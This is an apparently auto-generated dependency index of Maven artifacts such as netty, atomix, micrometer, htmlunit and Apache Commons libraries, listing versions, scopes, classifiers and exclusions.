commons-lang:commons-lang@2.4 commons-logging:commons-logging@1.1.1 commons-digester:commons-digester@1.8 commons-beanutils:commons-beanutils-core@1.8.0 Opt|commons-codec:commons-codec@1.3 Opt|commons-jxpath:commons-jxpath@1.3 Scope provided|xerces:xercesImpl@2.3.0 Scope provided|xalan:xalan@2.7.0 Scope provided|xml-apis:xml-apis@1.0.b2 Opt|javax.servlet:servlet-api@2.4 Opt|javax.mail:mail@1.4 Opt|ant:ant@1.6.5 commons-digester:commons-digester 1.8 commons-beanutils:commons-beanutils@1.7.0 commons-logging:commons-logging@1.1 Scope provided|xml-apis:xml-apis@1.0.b2 commons-httpclient:commons-httpclient 3.1 commons-logging:commons-logging@1.0.4 commons-codec:commons-codec@1.2 commons-io:commons-io 2.4 2.7 2.14.0 commons-lang:commons-lang 2.6 
commons-logging:commons-logging 1.1.3 Opt|log4j:log4j@1.2.17 Opt|logkit:logkit@1.0.1 Opt|avalon-framework:avalon-framework@4.1.5 Opt Scope provided|javax.servlet:servlet-api@2.3 1.2 Opt|log4j:log4j@1.2.17 Opt|logkit:logkit@1.0.1 Opt|avalon-framework:avalon-framework@4.1.5 Opt Scope provided|javax.servlet:servlet-api@2.3 commons-net:commons-net 3.1 3.6 3.9.0 de.rototor.pdfbox:graphics2d 0.24 org.apache.pdfbox:pdfbox@2.0.16 findbugs:annotations 1.0.0 io.atomix:atomix 3.0.0-rc5 io.atomix:atomix-cluster@3.0.0-rc5 io.atomix:atomix-primitive@3.0.0-rc5 Opt|io.atomix:atomix-gossip@3.0.0-rc5 Opt|io.atomix:atomix-raft@3.0.0-rc5 Opt|io.atomix:atomix-primary-backup@3.0.0-rc5 io.atomix:atomix-utils@3.0.0-rc5 Opt|javax.ws.rs:javax.ws.rs-api@2.0 org.slf4j:slf4j-api@1.7.7 3.1.6 io.atomix:atomix-cluster@3.1.6 io.atomix:atomix-primitive@3.1.6 Opt|io.atomix:atomix-gossip@3.1.6 Opt|io.atomix:atomix-raft@3.1.6 Opt|io.atomix:atomix-primary-backup@3.1.6 Opt|io.atomix:atomix-log@3.1.6 io.atomix:atomix-utils@3.1.6 org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-cluster 3.0.0-rc5 io.atomix:atomix-utils@3.0.0-rc5 io.netty:netty-transport@4.1.27.Final io.netty:netty-codec@4.1.27.Final io.netty:netty-handler@4.1.27.Final MavenClassifier linux-x86_64|io.netty:netty-transport-native-epoll@4.1.27.Final org.slf4j:slf4j-api@1.7.7 3.1.6 io.atomix:atomix-utils@3.1.6 io.netty:netty-transport@4.1.27.Final io.netty:netty-codec@4.1.27.Final io.netty:netty-handler@4.1.27.Final MavenClassifier linux-x86_64|io.netty:netty-transport-native-epoll@4.1.27.Final org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-parent 3.0.0-rc5 org.slf4j:slf4j-api@1.7.7 3.1.6 org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-primary-backup 3.0.0-rc5 io.atomix:atomix-primitive@3.0.0-rc5 io.atomix:atomix-utils@3.0.0-rc5 org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-primitive 3.0.0-rc5 io.atomix:atomix-cluster@3.0.0-rc5 io.atomix:atomix-storage@3.0.0-rc5 io.atomix:atomix-utils@3.0.0-rc5 org.slf4j:slf4j-api@1.7.7 3.1.6 io.atomix:atomix-cluster@3.1.6 
io.atomix:atomix-storage@3.1.6 io.atomix:atomix-utils@3.1.6 org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-protocols-parent 3.0.0-rc5 org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-raft 3.0.0-rc5 io.atomix:atomix-primitive@3.0.0-rc5 org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-storage 3.0.0-rc5 io.atomix:atomix-utils@3.0.0-rc5 org.slf4j:slf4j-api@1.7.7 3.1.6 io.atomix:atomix-utils@3.1.6 org.slf4j:slf4j-api@1.7.7 io.atomix:atomix-utils 3.0.0-rc5 com.google.guava:guava@22.0 org.apache.commons:commons-lang3@3.7 org.apache.commons:commons-math3@3.6.1 com.esotericsoftware:kryo@4.0.2 com.typesafe:config@1.3.2 io.github.lukehutch:fast-classpath-scanner@2.21 org.slf4j:slf4j-api@1.7.7 3.1.6 com.google.guava:guava@22.0 org.apache.commons:commons-lang3@3.7 org.apache.commons:commons-math3@3.6.1 com.esotericsoftware:kryo@4.0.2 com.typesafe:config@1.3.2 io.github.classgraph:classgraph@4.2.3 org.slf4j:slf4j-api@1.7.7 io.dropwizard.metrics:metrics-bom 4.0.7 org.slf4j:slf4j-api@1.7.26 4.1.14 org.slf4j:slf4j-api@1.7.30 io.dropwizard.metrics:metrics-core 4.0.7 org.slf4j:slf4j-api@1.7.26 4.1.14 org.slf4j:slf4j-api@1.7.30 io.dropwizard.metrics:metrics-healthchecks 4.1.14 Opt|io.dropwizard.metrics:metrics-jvm@4.1.14 org.slf4j:slf4j-api@1.7.30 io.dropwizard.metrics:metrics-jmx 4.0.7 io.dropwizard.metrics:metrics-core@4.0.7 org.slf4j:slf4j-api@1.7.26 4.1.14 io.dropwizard.metrics:metrics-core@4.1.14 org.slf4j:slf4j-api@1.7.30 io.dropwizard.metrics:metrics-json 4.1.14 io.dropwizard.metrics:metrics-core@4.1.14 Opt|io.dropwizard.metrics:metrics-healthchecks@4.1.14 com.fasterxml.jackson.core:jackson-databind@2.9.10.5 org.slf4j:slf4j-api@1.7.30 io.dropwizard.metrics:metrics-jvm 4.1.14 io.dropwizard.metrics:metrics-core@4.1.14 org.slf4j:slf4j-api@1.7.30 io.dropwizard.metrics:metrics-parent 4.0.7 org.slf4j:slf4j-api@1.7.26 4.1.14 org.slf4j:slf4j-api@1.7.30 io.dropwizard.metrics:metrics-servlets 4.1.14 io.dropwizard.metrics:metrics-core@4.1.14 io.dropwizard.metrics:metrics-healthchecks@4.1.14 
io.dropwizard.metrics:metrics-json@4.1.14 io.dropwizard.metrics:metrics-jvm@4.1.14 com.helger:profiler@1.1.1 Scope provided|javax.servlet:javax.servlet-api@3.1.0 com.fasterxml.jackson.core:jackson-databind@2.9.10.5 org.slf4j:slf4j-api@1.7.30 io.github.classgraph:classgraph 4.2.3 4.8.112 Scope provided|org.eclipse.jdt:org.eclipse.jdt.annotation@2.2.600 io.github.lukehutch:fast-classpath-scanner 2.21 io.micrometer:micrometer-core 1.6.0 org.hdrhistogram:HdrHistogram@2.1.12 Scope runtime MavenExclusions org.hdrhistogram:HdrHistogram|org.latencyutils:LatencyUtils@2.0.3 Opt|com.google.code.findbugs:jsr305@3.0.2 Opt|io.dropwizard.metrics:metrics-core@4.0.7 Opt|com.google.guava:guava@30.0-jre Opt|com.github.ben-manes.caffeine:caffeine@2.8.6 Opt|net.sf.ehcache:ehcache@2.10.6 Opt|javax.cache:cache-api@1.1.1 Opt|com.hazelcast:hazelcast@4.1-BETA-1 Opt|org.hibernate:hibernate-entitymanager@5.4.22.Final Opt|org.eclipse.jetty:jetty-server@9.4.33.v20201020 Opt|org.eclipse.jetty:jetty-client@9.4.33.v20201020 Opt|org.apache.tomcat.embed:tomcat-embed-core@8.5.59 Opt|org.apache.httpcomponents:httpclient@4.5.13 Opt|org.apache.httpcomponents:httpasyncclient@4.1.4 Opt|com.netflix.hystrix:hystrix-core@1.5.12 Opt|ch.qos.logback:logback-classic@1.2.3 Opt|org.apache.logging.log4j:log4j-core@2.13.3 Opt|io.projectreactor:reactor-core@3.3.11.RELEASE Opt|io.projectreactor.netty:reactor-netty@0.9.13.RELEASE Opt|org.aspectj:aspectjweaver@1.8.14 Opt|com.squareup.okhttp3:okhttp@4.10.0-RC1 Opt|org.mongodb:mongo-java-driver@3.12.7 Opt|org.jooq:jooq@3.13.6 Opt|org.apache.kafka:kafka-clients@2.6.0 Opt|org.apache.kafka:kafka-streams@2.6.0 io.micrometer:micrometer-registry-jmx 1.6.0 io.micrometer:micrometer-core@1.6.0 io.dropwizard.metrics:metrics-jmx@4.0.7 Opt|com.google.code.findbugs:jsr305@3.0.2 io.micrometer:micrometer-registry-prometheus 1.6.0 io.micrometer:micrometer-core@1.6.0 io.prometheus:simpleclient_common@0.9.0 Opt|com.google.code.findbugs:jsr305@3.0.2 io.netty:netty 3.5.2.Final 
Opt|org.jboss.marshalling:jboss-marshalling@1.3.14.GA Opt|com.google.protobuf:protobuf-java@2.4.1 Opt|javax.servlet:servlet-api@2.5 Opt|javax.activation:activation@1.1.1 Opt|org.apache.felix:org.osgi.core@1.4.0 Opt MavenExclusions org.apache.felix:javax.servlet,org.apache.felix:org.osgi.foundation|org.apache.felix:org.osgi.compendium@1.4.0 Opt|org.slf4j:slf4j-api@1.6.4 Opt|commons-logging:commons-logging@1.1.1 Opt|org.jboss.logging:jboss-logging-spi@2.1.2.GA Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|log4j:log4j@1.2.16 3.7.0.Final Opt|org.jboss.marshalling:jboss-marshalling@1.3.14.GA Opt|com.google.protobuf:protobuf-java@2.5.0 Opt|javax.servlet:servlet-api@2.5 Opt|javax.activation:activation@1.1.1 Opt|org.apache.felix:org.osgi.core@1.4.0 Opt MavenExclusions org.apache.felix:javax.servlet,org.apache.felix:org.osgi.foundation|org.apache.felix:org.osgi.compendium@1.4.0 Opt|org.slf4j:slf4j-api@1.6.4 Opt|commons-logging:commons-logging@1.1.1 Opt|org.jboss.logging:jboss-logging-spi@2.1.2.GA Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|log4j:log4j@1.2.16 3.9.8.Final Opt MavenClassifier windows-x86_64|io.netty:netty-tcnative@1.1.30.Fork2 Opt|org.jboss.marshalling:jboss-marshalling@1.3.14.GA Opt|com.google.protobuf:protobuf-java@2.5.0 Opt|org.bouncycastle:bcpkix-jdk15on@1.50 Opt|org.eclipse.jetty.npn:npn-api@1.1.0.v20120525 Opt|javax.servlet:servlet-api@2.5 Opt|javax.activation:activation@1.1.1 Opt|org.apache.felix:org.osgi.core@1.4.0 Opt MavenExclusions org.apache.felix:javax.servlet,org.apache.felix:org.osgi.foundation|org.apache.felix:org.osgi.compendium@1.4.0 Opt|org.slf4j:slf4j-api@1.6.4 Opt|commons-logging:commons-logging@1.1.1 Opt|org.jboss.logging:jboss-logging@3.1.4.GA Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|log4j:log4j@1.2.16 io.netty:netty-bom 4.1.27.Final 4.1.109.Final io.netty:netty-buffer 4.1.27.Final 
io.netty:netty-common@4.1.27.Final io.netty:netty-codec 4.1.27.Final io.netty:netty-transport@4.1.27.Final Opt|com.google.protobuf:protobuf-java@2.6.1 Opt|com.google.protobuf.nano:protobuf-javanano@3.0.0-alpha-5 Opt|org.jboss.marshalling:jboss-marshalling@1.4.11.Final Opt|com.jcraft:jzlib@1.1.3 Opt|com.ning:compress-lzf@1.0.3 Opt|net.jpountz.lz4:lz4@1.3.0 Opt|com.github.jponge:lzma-java@1.3 4.1.68.Final io.netty:netty-common@4.1.68.Final io.netty:netty-buffer@4.1.68.Final io.netty:netty-transport@4.1.68.Final Opt|com.google.protobuf:protobuf-java@2.6.1 Opt|com.google.protobuf.nano:protobuf-javanano@3.0.0-alpha-5 Opt|org.jboss.marshalling:jboss-marshalling@1.4.11.Final Opt|com.jcraft:jzlib@1.1.3 Opt|com.ning:compress-lzf@1.0.3 Opt|net.jpountz.lz4:lz4@1.3.0 Opt|com.github.jponge:lzma-java@1.3 Opt|com.github.luben:zstd-jni@1.5.0-2 Opt|com.aayushatharva.brotli4j:brotli4j@1.5.0 Opt|com.aayushatharva.brotli4j:native-linux-x86_64@1.5.0 Opt|com.aayushatharva.brotli4j:native-osx-x86_64@1.5.0 Opt|com.aayushatharva.brotli4j:native-windows-x86_64@1.5.0 4.1.125.Final io.netty:netty-common@4.1.125.Final io.netty:netty-buffer@4.1.125.Final io.netty:netty-transport@4.1.125.Final Opt|com.google.protobuf:protobuf-java@2.6.1 Opt|com.google.protobuf.nano:protobuf-javanano@3.0.0-alpha-5 Opt|org.jboss.marshalling:jboss-marshalling@1.4.11.Final Opt|com.jcraft:jzlib@1.1.3 Opt|com.ning:compress-lzf@1.0.3 Opt|org.lz4:lz4-java@1.8.0 Opt|com.github.jponge:lzma-java@1.3 Opt|com.github.luben:zstd-jni@1.5.5-11 Opt|com.aayushatharva.brotli4j:brotli4j@1.16.0 Opt|com.aayushatharva.brotli4j:native-linux-x86_64@1.16.0 Opt|com.aayushatharva.brotli4j:native-linux-aarch64@1.16.0 Opt|com.aayushatharva.brotli4j:native-linux-riscv64@1.16.0 Opt|com.aayushatharva.brotli4j:native-osx-x86_64@1.16.0 Opt|com.aayushatharva.brotli4j:native-osx-aarch64@1.16.0 Opt|com.aayushatharva.brotli4j:native-windows-x86_64@1.16.0 io.netty:netty-common 4.1.27.Final Opt|org.slf4j:slf4j-api@1.7.21 
Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|log4j:log4j@1.2.17 Opt|org.apache.logging.log4j:log4j-api@2.6.2 4.1.45.Final Scope provided MavenExclusions com.oracle.substratevm:svm-hosted-native-linux-amd64,com.oracle.substratevm:svm-hosted-native-darwin-amd64,com.oracle.substratevm:svm-hosted-native-windows-amd64,org.graalvm.sdk:graal-sdk,com.oracle.substratevm:objectfile,com.oracle.substratevm:pointsto,org.graalvm.truffle:truffle-nfi,org.graalvm.compiler:compiler|com.oracle.substratevm:svm@19.0.0 Opt|org.slf4j:slf4j-api@1.7.21 Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|log4j:log4j@1.2.17 Opt|org.apache.logging.log4j:log4j-api@2.6.2 Opt|io.projectreactor.tools:blockhound@1.0.1.RELEASE 4.1.46.Final Scope provided MavenExclusions com.oracle.substratevm:svm-hosted-native-linux-amd64,com.oracle.substratevm:svm-hosted-native-darwin-amd64,com.oracle.substratevm:svm-hosted-native-windows-amd64,org.graalvm.sdk:graal-sdk,com.oracle.substratevm:objectfile,com.oracle.substratevm:pointsto,org.graalvm.truffle:truffle-nfi,org.graalvm.compiler:compiler|com.oracle.substratevm:svm@19.0.0 Opt|org.slf4j:slf4j-api@1.7.21 Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|log4j:log4j@1.2.17 Opt|org.apache.logging.log4j:log4j-api@2.6.2 Opt|io.projectreactor.tools:blockhound@1.0.2.RELEASE 4.1.68.Final Scope provided MavenExclusions org.graalvm.nativeimage:svm-hosted-native-linux-amd64,org.graalvm.nativeimage:svm-hosted-native-darwin-amd64,org.graalvm.nativeimage:svm-hosted-native-windows-amd64,org.graalvm.sdk:graal-sdk,org.graalvm.nativeimage:objectfile,org.graalvm.nativeimage:pointsto,org.graalvm.truffle:truffle-nfi,org.graalvm.compiler:compiler|org.graalvm.nativeimage:svm@19.3.6 Opt|org.slf4j:slf4j-api@1.7.30 
Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|org.apache.logging.log4j:log4j-1.2-api@2.14.1 Opt|org.apache.logging.log4j:log4j-api@2.6.2 Opt|io.projectreactor.tools:blockhound@1.0.6.RELEASE 4.1.94.Final Scope provided MavenExclusions org.graalvm.nativeimage:svm-hosted-native-linux-amd64,org.graalvm.nativeimage:svm-hosted-native-darwin-amd64,org.graalvm.nativeimage:svm-hosted-native-windows-amd64,org.graalvm.sdk:graal-sdk,org.graalvm.nativeimage:objectfile,org.graalvm.nativeimage:pointsto,org.graalvm.truffle:truffle-nfi,org.graalvm.compiler:compiler|org.graalvm.nativeimage:svm@19.3.6 Scope provided|org.jetbrains:annotations-java5@23.0.0 Opt|org.slf4j:slf4j-api@1.7.30 Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|org.apache.logging.log4j:log4j-1.2-api@2.17.2 Opt|org.apache.logging.log4j:log4j-api@2.17.2 Opt|io.projectreactor.tools:blockhound@1.0.6.RELEASE 4.1.115.Final Scope provided MavenExclusions org.graalvm.nativeimage:svm-hosted-native-linux-amd64,org.graalvm.nativeimage:svm-hosted-native-darwin-amd64,org.graalvm.nativeimage:svm-hosted-native-windows-amd64,org.graalvm.sdk:graal-sdk,org.graalvm.nativeimage:objectfile,org.graalvm.nativeimage:pointsto,org.graalvm.truffle:truffle-nfi,org.graalvm.compiler:compiler|org.graalvm.nativeimage:svm@19.3.6 Scope provided|org.jetbrains:annotations-java5@23.0.0 Opt|org.slf4j:slf4j-api@1.7.30 Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|org.apache.logging.log4j:log4j-1.2-api@2.17.2 Opt|org.apache.logging.log4j:log4j-api@2.17.2 Opt|io.projectreactor.tools:blockhound@1.0.6.RELEASE 4.1.118.Final Scope provided MavenExclusions 
org.graalvm.nativeimage:svm-hosted-native-linux-amd64,org.graalvm.nativeimage:svm-hosted-native-darwin-amd64,org.graalvm.nativeimage:svm-hosted-native-windows-amd64,org.graalvm.sdk:graal-sdk,org.graalvm.nativeimage:objectfile,org.graalvm.nativeimage:pointsto,org.graalvm.truffle:truffle-nfi,org.graalvm.compiler:compiler|org.graalvm.nativeimage:svm@19.3.6 Scope provided|org.jetbrains:annotations-java5@23.0.0 Opt|org.slf4j:slf4j-api@1.7.30 Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|org.apache.logging.log4j:log4j-1.2-api@2.17.2 Opt|org.apache.logging.log4j:log4j-api@2.17.2 Opt|io.projectreactor.tools:blockhound@1.0.10.RELEASE 4.1.125.Final Opt|org.graalvm.nativeimage:svm@19.3.6 Scope provided|org.jboss:jdk-misc@3.Final Scope provided|org.jetbrains:annotations-java5@23.0.0 Opt|org.slf4j:slf4j-api@1.7.30 Opt|commons-logging:commons-logging@1.2 Opt MavenExclusions javax.mail:mail,javax.jms:jms,com.sun.jdmk:jmxtools,com.sun.jmx:jmxri|org.apache.logging.log4j:log4j-1.2-api@2.17.2 Opt|org.apache.logging.log4j:log4j-api@2.17.2 Opt|io.projectreactor.tools:blockhound@1.0.13.RELEASE io.netty:netty-handler 4.1.27.Final io.netty:netty-buffer@4.1.27.Final io.netty:netty-transport@4.1.27.Final io.netty:netty-codec@4.1.27.Final Opt|org.bouncycastle:bcpkix-jdk15on@1.54 Opt Scope provided|org.eclipse.jetty.npn:npn-api@1.1.1.v20141010 Opt Scope provided|org.eclipse.jetty.alpn:alpn-api@1.1.2.v20150522 Opt|org.conscrypt:conscrypt-openjdk-uber@1.1.3 4.1.45.Final io.netty:netty-common@4.1.45.Final io.netty:netty-buffer@4.1.45.Final io.netty:netty-transport@4.1.45.Final io.netty:netty-codec@4.1.45.Final Opt|org.bouncycastle:bcpkix-jdk15on@1.54 Opt Scope provided|org.eclipse.jetty.npn:npn-api@1.1.1.v20141010 Opt Scope provided|org.eclipse.jetty.alpn:alpn-api@1.1.2.v20150522 Opt|org.conscrypt:conscrypt-openjdk-uber@1.3.0 4.1.46.Final io.netty:netty-common@4.1.46.Final io.netty:netty-resolver@4.1.46.Final 
io.netty:netty-buffer@4.1.46.Final io.netty:netty-transport@4.1.46.Final io.netty:netty-codec@4.1.46.Final Opt|org.bouncycastle:bcpkix-jdk15on@1.54 Opt Scope provided|org.eclipse.jetty.npn:npn-api@1.1.1.v20141010 Opt Scope provided|org.eclipse.jetty.alpn:alpn-api@1.1.2.v20150522 Opt|org.conscrypt:conscrypt-openjdk-uber@1.3.0 4.1.94.Final io.netty:netty-common@4.1.94.Final io.netty:netty-resolver@4.1.94.Final io.netty:netty-buffer@4.1.94.Final io.netty:netty-transport@4.1.94.Final io.netty:netty-transport-native-unix-common@4.1.94.Final io.netty:netty-codec@4.1.94.Final Opt|io.netty:netty-tcnative-classes@2.0.61.Final Opt|org.bouncycastle:bcpkix-jdk15on@1.69 Opt|org.bouncycastle:bctls-jdk15on@1.69 Opt Scope provided|org.eclipse.jetty.npn:npn-api@1.1.1.v20141010 Opt Scope provided|org.eclipse.jetty.alpn:alpn-api@1.1.2.v20150522 Opt|org.conscrypt:conscrypt-openjdk-uber@2.5.2 4.1.118.Final io.netty:netty-common@4.1.118.Final io.netty:netty-resolver@4.1.118.Final io.netty:netty-buffer@4.1.118.Final io.netty:netty-transport@4.1.118.Final io.netty:netty-transport-native-unix-common@4.1.118.Final io.netty:netty-codec@4.1.118.Final Opt|io.netty:netty-tcnative-classes@2.0.70.Final Opt|org.bouncycastle:bcpkix-jdk15on@1.69 Opt|org.bouncycastle:bctls-jdk15on@1.69 Opt Scope provided|org.eclipse.jetty.npn:npn-api@1.1.1.v20141010 Opt Scope provided|org.eclipse.jetty.alpn:alpn-api@1.1.2.v20150522 Opt|org.conscrypt:conscrypt-openjdk-uber@2.5.2 io.netty:netty-parent 4.1.27.Final 4.1.45.Final 4.1.46.Final 4.1.68.Final 4.1.94.Final 4.1.115.Final 4.1.118.Final 4.1.125.Final io.netty:netty-resolver 4.1.27.Final io.netty:netty-common@4.1.27.Final io.netty:netty-transport 4.1.27.Final io.netty:netty-buffer@4.1.27.Final io.netty:netty-resolver@4.1.27.Final io.netty:netty-transport-native-epoll 4.1.27.Final io.netty:netty-common@4.1.27.Final io.netty:netty-buffer@4.1.27.Final io.netty:netty-transport-native-unix-common@4.1.27.Final io.netty:netty-transport@4.1.27.Final 
io.netty:netty-transport-native-unix-common 4.1.27.Final io.netty:netty-common@4.1.27.Final io.netty:netty-transport@4.1.27.Final 4.1.94.Final Opt MavenClassifier sources|io.netty:netty-jni-util@0.0.6.Final io.netty:netty-common@4.1.94.Final io.netty:netty-buffer@4.1.94.Final io.netty:netty-transport@4.1.94.Final 4.1.118.Final Opt MavenClassifier sources|io.netty:netty-jni-util@0.0.9.Final io.netty:netty-common@4.1.118.Final io.netty:netty-buffer@4.1.118.Final io.netty:netty-transport@4.1.118.Final io.prometheus:parent 0.9.0 io.prometheus:simpleclient 0.9.0 io.prometheus:simpleclient_common 0.9.0 io.prometheus:simpleclient@0.9.0 jakarta.activation:jakarta.activation-api 1.2.1 jakarta.annotation:ca-parent 1.3.5 jakarta.annotation:jakarta.annotation-api 1.3.5 jakarta.persistence:jakarta.persistence-api 2.2.3 jakarta.servlet:jakarta.servlet-api 4.0.3 jakarta.validation:jakarta.validation-api 2.0.2 jakarta.ws.rs:jakarta.ws.rs-api 2.1.6 jakarta.xml.bind:jakarta.xml.bind-api 2.3.2 jakarta.activation:jakarta.activation-api@1.2.1 jakarta.xml.bind:jakarta.xml.bind-api-parent 2.3.2 javax.activation:activation 1.1 javax.annotation:javax.annotation-api 1.3.2 javax.annotation:jsr250-api 1.0 javax.enterprise:cdi-api 1.0 Opt|javax.el:el-api@2.1.2-b04 Opt MavenExclusions jbossws:jboss-jaxrpc,org.jboss.javaee:jboss-transaction-api,jboss.jbossws:jboss-jaxrpc|org.jboss.ejb3:jboss-ejb3-api@3.1.0 org.jboss.interceptor:jboss-interceptor-api@1.1 javax.annotation:jsr250-api@1.0 javax.inject:javax.inject@1 javax.inject:javax.inject 1 javax.servlet.jsp:jsp-api 2.1 2.2 Scope provided|org.glassfish:javax.servlet@3.0-b72 Scope provided|javax.el:el-api@2.2 javax.servlet:javax.servlet-api 3.1.0 javax.servlet:servlet-api 2.5 javax.websocket:javax.websocket-all 1.0 javax.websocket:javax.websocket-api 1.0 Opt|javax.websocket:javax.websocket-client-api@1.0 javax.websocket:javax.websocket-client-api 1.0 javax.ws.rs:javax.ws.rs-api 2.1 javax.xml.bind:jaxb-api 2.2.2 javax.xml.stream:stax-api@1.0-2 
javax.activation:activation@1.1 javax.xml.stream:stax-api 1.0-2 jline:jline 2.14.3 net.bytebuddy:byte-buddy 1.11.13 Scope provided|net.java.dev.jna:jna@5.8.0 Scope provided|net.java.dev.jna:jna-platform@5.8.0 Scope provided|com.google.code.findbugs:findbugs-annotations@3.0.1 net.bytebuddy:byte-buddy-agent 1.11.13 Scope provided|net.java.dev.jna:jna@5.8.0 Scope provided|net.java.dev.jna:jna-platform@5.8.0 Scope provided|com.google.code.findbugs:findbugs-annotations@3.0.1 net.bytebuddy:byte-buddy-parent 1.11.13 Scope provided|com.google.code.findbugs:findbugs-annotations@3.0.1 net.java.dev.jets3t:jets3t 0.9.0 commons-codec:commons-codec@1.4 commons-logging:commons-logging@1.1.1 MavenExclusions commons-codec:commons-codec,commons-logging:commons-logging|org.apache.httpcomponents:httpclient@4.1.2 MavenExclusions commons-codec:commons-codec,commons-logging:commons-logging|org.apache.httpcomponents:httpcore@4.1.2 com.jamesmurty.utils:java-xmlbuilder@0.4 net.java.dev.jna:jna 4.1.0 4.5.2 net.java.dev.jna:jna-platform 4.1.0 net.java.dev.jna:jna@4.1.0 net.java:jvnet-parent 1 3 4 5 net.sf.ehcache:ehcache-core 2.4.4 org.slf4j:slf4j-api@1.6.1 Scope provided|org.slf4j:slf4j-jdk14@1.6.1 Scope provided|javax.servlet:servlet-api@2.4 Scope provided MavenExclusions javax.transaction:jta,javax.security:jacc,net.sf.ehcache:ehcache|org.hibernate:hibernate-core@3.5.1-Final Scope provided|javax.transaction:jta@1.1 net.sf.ehcache:ehcache-parent 2.2 net.sourceforge.cssparser:cssparser 0.9.16 org.w3c.css:sac@1.3 net.sourceforge.htmlunit:htmlunit 2.18 MavenExclusions xerces:xercesImpl|xalan:xalan@2.7.2 commons-collections:commons-collections@3.2.1 org.apache.commons:commons-lang3@3.4 org.apache.httpcomponents:httpclient@4.5 org.apache.httpcomponents:httpmime@4.5 commons-codec:commons-codec@1.10 net.sourceforge.htmlunit:htmlunit-core-js@2.17 xerces:xercesImpl@2.11.0 MavenExclusions xerces:xercesImpl|net.sourceforge.nekohtml:nekohtml@1.9.22 net.sourceforge.cssparser:cssparser@0.9.16 
commons-io:commons-io@2.4 commons-logging:commons-logging@1.2 org.eclipse.jetty.websocket:websocket-client@9.2.12.v20150709 2.37.0 MavenExclusions xerces:xercesImpl,xml-apis:xml-apis|xalan:xalan@2.7.2 org.apache.commons:commons-lang3@3.9 MavenExclusions org.apache.commons:commons-lang3|org.apache.commons:commons-text@1.8 org.apache.httpcomponents:httpmime@4.5.11 net.sourceforge.htmlunit:htmlunit-core-js@2.37.0 net.sourceforge.htmlunit:neko-htmlunit@2.37.0 net.sourceforge.htmlunit:htmlunit-cssparser@1.5.0 commons-io:commons-io@2.6 commons-logging:commons-logging@1.2 commons-net:commons-net@3.6 org.brotli:dec@0.1.2 org.eclipse.jetty.websocket:websocket-client@9.4.26.v20200117 net.sourceforge.htmlunit:htmlunit-core-js 2.17 2.37.0 net.sourceforge.htmlunit:htmlunit-cssparser 1.5.0 net.sourceforge.htmlunit:neko-htmlunit 2.37.0 xerces:xercesImpl@2.12.0 2.61.0 xerces:xercesImpl@2.12.2 net.sourceforge.nekohtml:nekohtml 1.9.22 xerces:xercesImpl@2.11.0 org.apache.avro:avro 1.7.4 org.codehaus.jackson:jackson-core-asl@1.8.8 org.codehaus.jackson:jackson-mapper-asl@1.8.8 com.thoughtworks.paranamer:paranamer@2.3 org.xerial.snappy:snappy-java@1.0.4.1 org.apache.commons:commons-compress@1.4.1 org.slf4j:slf4j-api@1.6.4 Opt Scope runtime|org.slf4j:slf4j-simple@1.6.4 org.apache.avro:avro-parent 1.7.4 org.slf4j:slf4j-api@1.6.4 Opt Scope runtime|org.slf4j:slf4j-simple@1.6.4 org.apache.avro:avro-toplevel 1.7.4 org.apache.commons:commons-compress 1.21 Opt|com.github.luben:zstd-jni@1.5.0-2 Opt|org.brotli:dec@0.1.2 Opt|org.tukaani:xz@1.9 Opt|asm:asm@3.2 Scope provided|org.osgi:org.osgi.core@6.0.0 1.26.0 Opt|com.github.luben:zstd-jni@1.5.5-11 Opt|org.brotli:dec@0.1.2 Opt|org.tukaani:xz@1.9 Opt|commons-codec:commons-codec@1.16.1 Opt|org.ow2.asm:asm@9.6 commons-io:commons-io@2.15.1 org.apache.commons:commons-lang3@3.14.0 Scope provided|org.osgi:org.osgi.core@6.0.0 org.apache.commons:commons-configuration2 2.8.0 org.apache.commons:commons-lang3@3.12.0 org.apache.commons:commons-text@1.9 
MavenExclusions logkit:logkit,avalon-framework:avalon-framework|commons-logging:commons-logging@1.2 Opt|commons-beanutils:commons-beanutils@1.9.4 Opt|commons-codec:commons-codec@1.15 Opt|org.apache.commons:commons-jexl@2.1.1 Opt|org.apache.commons:commons-vfs2@2.9.0 Opt MavenExclusions xerces:xerces,ant:ant-optional|commons-jxpath:commons-jxpath@1.3 Opt|xml-resolver:xml-resolver@1.2 Opt|org.springframework:spring-core@5.3.21 Opt|org.springframework:spring-beans@5.3.21 Scope provided|javax.servlet:servlet-api@2.5 Opt|org.yaml:snakeyaml@1.30 Opt|com.fasterxml.jackson.core:jackson-databind@2.13.3 Opt|log4j:log4j@1.2.17 2.10.1 org.apache.commons:commons-lang3@3.14.0 org.apache.commons:commons-text@1.11.0 MavenExclusions logkit:logkit,avalon-framework:avalon-framework|commons-logging:commons-logging@1.3.0 Opt|commons-beanutils:commons-beanutils@1.9.4 Opt|commons-codec:commons-codec@1.16.1 Opt|org.apache.commons:commons-jexl@2.1.1 